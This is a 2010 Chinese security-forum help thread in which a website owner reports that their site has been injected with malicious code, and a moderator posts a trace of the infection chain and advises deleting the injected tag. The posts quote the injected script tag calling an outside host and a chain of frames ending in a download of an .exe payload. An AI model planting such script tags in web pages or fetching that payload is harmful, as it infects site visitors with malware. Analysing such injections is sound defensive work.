瑞星卡卡安全论坛技术交流区恶意网站交流 各位大虾,网站被挂马,请看看这段代码,该如何处理!急!!!

1   1  /  1  页   跳转

[求助] 各位大虾,网站被挂马,请看看这段代码,该如何处理!急!!!

收藏
萤火虫8125
头像
初生襁褓狮
  • 帖子:2
  • 注册: 2010-05-06
  • 来自:
发表于: 2010-05-06 11:48 | 只看楼主 短消息 资料
字号: 1楼

各位大虾,网站被挂马,请看看这段代码,该如何处理!急!!!

网站已经被挂马有一段时间了,想了很多办法不顶用,我在网站上查到的代码是这样的:<script language="javascript" src="http://12d.officea.ze.tc/office.js?google_ad_format=728x90_as"></script>.

请问如何才能查到病毒源并删掉,并可以有防治的办法,请教具体的办法.
如方便可上MSN与我联系:wy_8125@hotmail.com

非常感谢!!

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
最后编辑networkedition 最后编辑于 2010-05-06 12:25:18
分享到:
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2010-05-06 12:26 | 短消息 资料
字号: 2楼

回复 1F 萤火虫8125 的帖子

网站地址是什么
gototop
 
萤火虫8125
头像
初生襁褓狮
  • 帖子:2
  • 注册: 2010-05-06
  • 来自:
发表于: 2010-05-07 08:56 | 只看楼主 短消息 资料
字号: 3楼

回复: 各位大虾,网站被挂马,请看看这段代码,该如何处理!急!!!

网址是
www.hbtyzx.org.cn
目前首页换成维护中了,真正首页名是index-20100427bf.htm,您这样输入可看到原本的首页:http://www.hbtyzx.org.cn/index-20100427bf.htm
最后编辑networkedition 最后编辑于 2010-05-07 09:20:20
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2010-05-07 09:21 | 短消息 资料
字号: 4楼

回复 3F 萤火虫8125 的帖子

是被挂马了
Log is generated by FreShow.
[wide]http://www.hbtyzx.org.cn/index-20100427bf.htm
    [frame]http://www.hbtyzx.org.cn/top.htm
    [script]http://www.hbtyzx.org.cn/stm31.js
    [frame]http://www.hbtyzx.org.cn/flashpic2.asp
    [script]http://www.hbtyzx.org.cn/./showasp/newscodejs1.asp?lm2=71&list=6&icon=1&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=22&more=0&t=0&week=0&zzly=0&hit=0&pls=0
    [script]http://www.hbtyzx.org.cn/./showasp/newscodejs1.asp?lm2=113&list=6&icon=1&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=22&more=0&t=0&week=0&zzly=0&hit=0&pls=0
    [frame]http://www.hbtyzx.org.cn/middle.asp
    [script]http://www.hbtyzx.org.cn/./showasp/newscodejs.asp?lm2=109&list=3&icon=1&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=24&more=0&t=0&week=0&zzly=0&hit=0&pls=0
    [frame]http://www.hbtyzx.org.cn/flashpic.asp
    [frame]http://www.hbtyzx.org.cn/pic4.asp
    [script]http://www.hbtyzx.org.cn/./showasp/newscodejs1.asp?lm2=111&list=7&icon=1&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=22&more=0&t=0&week=0&zzly=0&hit=0&pls=0
    [script]http://www.hbtyzx.org.cn/./showasp/newscodejs2.asp?lm2=84&list=6&icon=0&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=22&more=0&t=0&week=0&zzly=0&hit=0&pls=0
    [script]http://www.hbtyzx.org.cn/./showasp/newscodejs2.asp?lm2=85&list=6&icon=0&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=22&more=0&t=0&week=0&zzly=0&hit=0&pls=0
    [script]http://www.hbtyzx.org.cn/./showasp/newscodejs2.asp?lm2=114&list=6&icon=0&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=22&more=0&t=0&week=0&zzly=0&hit=0&pls=0
    [script]http://www.hbtyzx.org.cn/./showasp/newscodejs2.asp?lm2=87&list=6&icon=0&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=22&more=0&t=0&week=0&zzly=0&hit=0&pls=0
    [frame]http://www.hbtyzx.org.cn/bottom.htm
    [script]http://12f.officea.ze.tc/office.js?google_ad_format=728x90_as
        [frame]http://tm2.tvbs.viens.la:300/13index.htm
            [object]http://ukks.aa118.uicp.cn:300/a13.exe
        [frame]http://12f.officea.ze.tc/
        [frame]http://count25.51yes.com/sa.aspx?id=259340713&refe='+window.parent.location+'&location=http%3A//'+paramsArr[0]+'&color=32x&resolution=1280x1024&returning=1&language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2010-05-07 09:22 | 短消息 资料
字号: 5楼

回复 1F 萤火虫8125 的帖子

不是知道所挂恶意链接地址了嘛:http://12f.officea.ze.tc/office.js?google_ad_format=728x90_as在网站源代码中找到删除之。
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT